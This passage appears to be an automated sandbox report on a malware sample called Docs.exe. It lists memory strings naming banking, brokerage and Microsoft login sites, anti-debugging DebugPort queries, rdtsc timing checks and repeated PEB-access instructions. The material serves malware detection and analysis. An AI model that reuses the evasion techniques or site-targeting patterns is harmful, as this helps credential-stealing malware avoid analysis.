                      Source: UQ63g7r-.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: UQ63g7r-.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: UQ63g7r-.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: UQ63g7r-.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: tzutil.exe, 00000007.00000002.3288094917.000000000351D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt'Sea
                      Source: UQ63g7r-.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: UQ63g7r-.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: UQ63g7r-.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: UQ63g7r-.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: UQ63g7r-.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: UQ63g7r-.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: hrhhgLQrQIpiVv.exe, 00000008.00000002.3288965762.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: firefox.exe, 00000009.00000002.2886898769.000001E21964D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[[
                      Source: UQ63g7r-.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: UQ63g7r-.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: UQ63g7r-.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: UQ63g7r-.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: UQ63g7r-.7.drBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: UQ63g7r-.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
                      Source: UQ63g7r-.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: UQ63g7r-.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: UQ63g7r-.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: UQ63g7r-.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: UQ63g7r-.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: UQ63g7r-.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: UQ63g7r-.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: UQ63g7r-.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: UQ63g7r-.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: UQ63g7r-.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: C:\Users\user\Desktop\Docs.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E096E rdtsc 3_2_015E096E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00417B63 LdrLoadDll,3_2_00417B63
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674164 mov eax, dword ptr fs:[00000030h]3_2_01674164
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674164 mov eax, dword ptr fs:[00000030h]3_2_01674164
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A6154 mov eax, dword ptr fs:[00000030h]3_2_015A6154
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A6154 mov eax, dword ptr fs:[00000030h]3_2_015A6154
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159C156 mov eax, dword ptr fs:[00000030h]3_2_0159C156
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01634144 mov eax, dword ptr fs:[00000030h]3_2_01634144
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01634144 mov eax, dword ptr fs:[00000030h]3_2_01634144
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01634144 mov ecx, dword ptr fs:[00000030h]3_2_01634144
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01634144 mov eax, dword ptr fs:[00000030h]3_2_01634144
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01634144 mov eax, dword ptr fs:[00000030h]3_2_01634144
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01638158 mov eax, dword ptr fs:[00000030h]3_2_01638158
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E10E mov eax, dword ptr fs:[00000030h]3_2_0164E10E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E10E mov ecx, dword ptr fs:[00000030h]3_2_0164E10E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E10E mov eax, dword ptr fs:[00000030h]3_2_0164E10E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E10E mov eax, dword ptr fs:[00000030h]3_2_0164E10E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E10E mov ecx, dword ptr fs:[00000030h]3_2_0164E10E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E10E mov eax, dword ptr fs:[00000030h]3_2_0164E10E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E10E mov eax, dword ptr fs:[00000030h]3_2_0164E10E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E10E mov ecx, dword ptr fs:[00000030h]3_2_0164E10E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E10E mov eax, dword ptr fs:[00000030h]3_2_0164E10E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E10E mov ecx, dword ptr fs:[00000030h]3_2_0164E10E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01660115 mov eax, dword ptr fs:[00000030h]3_2_01660115
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D0124 mov eax, dword ptr fs:[00000030h]3_2_015D0124
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164A118 mov ecx, dword ptr fs:[00000030h]3_2_0164A118
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164A118 mov eax, dword ptr fs:[00000030h]3_2_0164A118
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164A118 mov eax, dword ptr fs:[00000030h]3_2_0164A118
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164A118 mov eax, dword ptr fs:[00000030h]3_2_0164A118
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016761E5 mov eax, dword ptr fs:[00000030h]3_2_016761E5
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016661C3 mov eax, dword ptr fs:[00000030h]3_2_016661C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016661C3 mov eax, dword ptr fs:[00000030h]3_2_016661C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D01F8 mov eax, dword ptr fs:[00000030h]3_2_015D01F8
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E1D0 mov eax, dword ptr fs:[00000030h]3_2_0161E1D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E1D0 mov eax, dword ptr fs:[00000030h]3_2_0161E1D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0161E1D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E1D0 mov eax, dword ptr fs:[00000030h]3_2_0161E1D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161E1D0 mov eax, dword ptr fs:[00000030h]3_2_0161E1D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159A197 mov eax, dword ptr fs:[00000030h]3_2_0159A197
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159A197 mov eax, dword ptr fs:[00000030h]3_2_0159A197
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159A197 mov eax, dword ptr fs:[00000030h]3_2_0159A197
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E0185 mov eax, dword ptr fs:[00000030h]3_2_015E0185
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01644180 mov eax, dword ptr fs:[00000030h]3_2_01644180
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01644180 mov eax, dword ptr fs:[00000030h]3_2_01644180
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165C188 mov eax, dword ptr fs:[00000030h]3_2_0165C188
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165C188 mov eax, dword ptr fs:[00000030h]3_2_0165C188
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162019F mov eax, dword ptr fs:[00000030h]3_2_0162019F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162019F mov eax, dword ptr fs:[00000030h]3_2_0162019F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162019F mov eax, dword ptr fs:[00000030h]3_2_0162019F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162019F mov eax, dword ptr fs:[00000030h]3_2_0162019F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A2050 mov eax, dword ptr fs:[00000030h]3_2_015A2050
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CC073 mov eax, dword ptr fs:[00000030h]3_2_015CC073
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626050 mov eax, dword ptr fs:[00000030h]3_2_01626050
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE016 mov eax, dword ptr fs:[00000030h]3_2_015BE016
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE016 mov eax, dword ptr fs:[00000030h]3_2_015BE016
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE016 mov eax, dword ptr fs:[00000030h]3_2_015BE016
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE016 mov eax, dword ptr fs:[00000030h]3_2_015BE016
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01636030 mov eax, dword ptr fs:[00000030h]3_2_01636030
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01624000 mov ecx, dword ptr fs:[00000030h]3_2_01624000
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01642000 mov eax, dword ptr fs:[00000030h]3_2_01642000
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01642000 mov eax, dword ptr fs:[00000030h]3_2_01642000
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01642000 mov eax, dword ptr fs:[00000030h]3_2_01642000
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01642000 mov eax, dword ptr fs:[00000030h]3_2_01642000
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01642000 mov eax, dword ptr fs:[00000030h]3_2_01642000
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01642000 mov eax, dword ptr fs:[00000030h]3_2_01642000
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01642000 mov eax, dword ptr fs:[00000030h]3_2_01642000
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01642000 mov eax, dword ptr fs:[00000030h]3_2_01642000
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159A020 mov eax, dword ptr fs:[00000030h]3_2_0159A020
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159C020 mov eax, dword ptr fs:[00000030h]3_2_0159C020
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016260E0 mov eax, dword ptr fs:[00000030h]3_2_016260E0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159C0F0 mov eax, dword ptr fs:[00000030h]3_2_0159C0F0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E20F0 mov ecx, dword ptr fs:[00000030h]3_2_015E20F0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A80E9 mov eax, dword ptr fs:[00000030h]3_2_015A80E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0159A0E3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016220DE mov eax, dword ptr fs:[00000030h]3_2_016220DE
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016380A8 mov eax, dword ptr fs:[00000030h]3_2_016380A8
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A208A mov eax, dword ptr fs:[00000030h]3_2_015A208A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016660B8 mov eax, dword ptr fs:[00000030h]3_2_016660B8
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016660B8 mov ecx, dword ptr fs:[00000030h]3_2_016660B8
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015980A0 mov eax, dword ptr fs:[00000030h]3_2_015980A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164437C mov eax, dword ptr fs:[00000030h]3_2_0164437C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0167634F mov eax, dword ptr fs:[00000030h]3_2_0167634F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166A352 mov eax, dword ptr fs:[00000030h]3_2_0166A352
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01648350 mov ecx, dword ptr fs:[00000030h]3_2_01648350
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov eax, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov eax, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov eax, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov ecx, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov eax, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov eax, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01678324 mov eax, dword ptr fs:[00000030h]3_2_01678324
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01678324 mov ecx, dword ptr fs:[00000030h]3_2_01678324
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01678324 mov eax, dword ptr fs:[00000030h]3_2_01678324
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01678324 mov eax, dword ptr fs:[00000030h]3_2_01678324
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159C310 mov ecx, dword ptr fs:[00000030h]3_2_0159C310
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C0310 mov ecx, dword ptr fs:[00000030h]3_2_015C0310
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA30B mov eax, dword ptr fs:[00000030h]3_2_015DA30B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA30B mov eax, dword ptr fs:[00000030h]3_2_015DA30B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA30B mov eax, dword ptr fs:[00000030h]3_2_015DA30B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A83C0 mov eax, dword ptr fs:[00000030h]3_2_015A83C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A83C0 mov eax, dword ptr fs:[00000030h]3_2_015A83C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A83C0 mov eax, dword ptr fs:[00000030h]3_2_015A83C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A83C0 mov eax, dword ptr fs:[00000030h]3_2_015A83C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D63FF mov eax, dword ptr fs:[00000030h]3_2_015D63FF
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016263C0 mov eax, dword ptr fs:[00000030h]3_2_016263C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165C3CD mov eax, dword ptr fs:[00000030h]3_2_0165C3CD
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE3F0 mov eax, dword ptr fs:[00000030h]3_2_015BE3F0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE3F0 mov eax, dword ptr fs:[00000030h]3_2_015BE3F0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE3F0 mov eax, dword ptr fs:[00000030h]3_2_015BE3F0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016443D4 mov eax, dword ptr fs:[00000030h]3_2_016443D4
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016443D4 mov eax, dword ptr fs:[00000030h]3_2_016443D4
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E3DB mov eax, dword ptr fs:[00000030h]3_2_0164E3DB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E3DB mov eax, dword ptr fs:[00000030h]3_2_0164E3DB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E3DB mov ecx, dword ptr fs:[00000030h]3_2_0164E3DB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E3DB mov eax, dword ptr fs:[00000030h]3_2_0164E3DB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01598397 mov eax, dword ptr fs:[00000030h]3_2_01598397
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01598397 mov eax, dword ptr fs:[00000030h]3_2_01598397
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01598397 mov eax, dword ptr fs:[00000030h]3_2_01598397
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E388 mov eax, dword ptr fs:[00000030h]3_2_0159E388
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E388 mov eax, dword ptr fs:[00000030h]3_2_0159E388
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E388 mov eax, dword ptr fs:[00000030h]3_2_0159E388
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C438F mov eax, dword ptr fs:[00000030h]3_2_015C438F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C438F mov eax, dword ptr fs:[00000030h]3_2_015C438F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A6259 mov eax, dword ptr fs:[00000030h]3_2_015A6259
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159A250 mov eax, dword ptr fs:[00000030h]3_2_0159A250
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01628243 mov eax, dword ptr fs:[00000030h]3_2_01628243
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01628243 mov ecx, dword ptr fs:[00000030h]3_2_01628243
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159826B mov eax, dword ptr fs:[00000030h]3_2_0159826B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165A250 mov eax, dword ptr fs:[00000030h]3_2_0165A250
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165A250 mov eax, dword ptr fs:[00000030h]3_2_0165A250
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A4260 mov eax, dword ptr fs:[00000030h]3_2_015A4260
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A4260 mov eax, dword ptr fs:[00000030h]3_2_015A4260
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A4260 mov eax, dword ptr fs:[00000030h]3_2_015A4260
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0167625D mov eax, dword ptr fs:[00000030h]3_2_0167625D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159823B mov eax, dword ptr fs:[00000030h]3_2_0159823B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA2C3 mov eax, dword ptr fs:[00000030h]3_2_015AA2C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA2C3 mov eax, dword ptr fs:[00000030h]3_2_015AA2C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA2C3 mov eax, dword ptr fs:[00000030h]3_2_015AA2C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA2C3 mov eax, dword ptr fs:[00000030h]3_2_015AA2C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA2C3 mov eax, dword ptr fs:[00000030h]3_2_015AA2C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016762D6 mov eax, dword ptr fs:[00000030h]3_2_016762D6
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B02E1 mov eax, dword ptr fs:[00000030h]3_2_015B02E1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B02E1 mov eax, dword ptr fs:[00000030h]3_2_015B02E1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B02E1 mov eax, dword ptr fs:[00000030h]3_2_015B02E1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov eax, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov ecx, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov eax, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov eax, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov eax, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov eax, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE284 mov eax, dword ptr fs:[00000030h]3_2_015DE284
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE284 mov eax, dword ptr fs:[00000030h]3_2_015DE284
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01620283 mov eax, dword ptr fs:[00000030h]3_2_01620283
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01620283 mov eax, dword ptr fs:[00000030h]3_2_01620283
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01620283 mov eax, dword ptr fs:[00000030h]3_2_01620283
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B02A0 mov eax, dword ptr fs:[00000030h]3_2_015B02A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B02A0 mov eax, dword ptr fs:[00000030h]3_2_015B02A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A8550 mov eax, dword ptr fs:[00000030h]3_2_015A8550
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A8550 mov eax, dword ptr fs:[00000030h]3_2_015A8550
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D656A mov eax, dword ptr fs:[00000030h]3_2_015D656A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D656A mov eax, dword ptr fs:[00000030h]3_2_015D656A
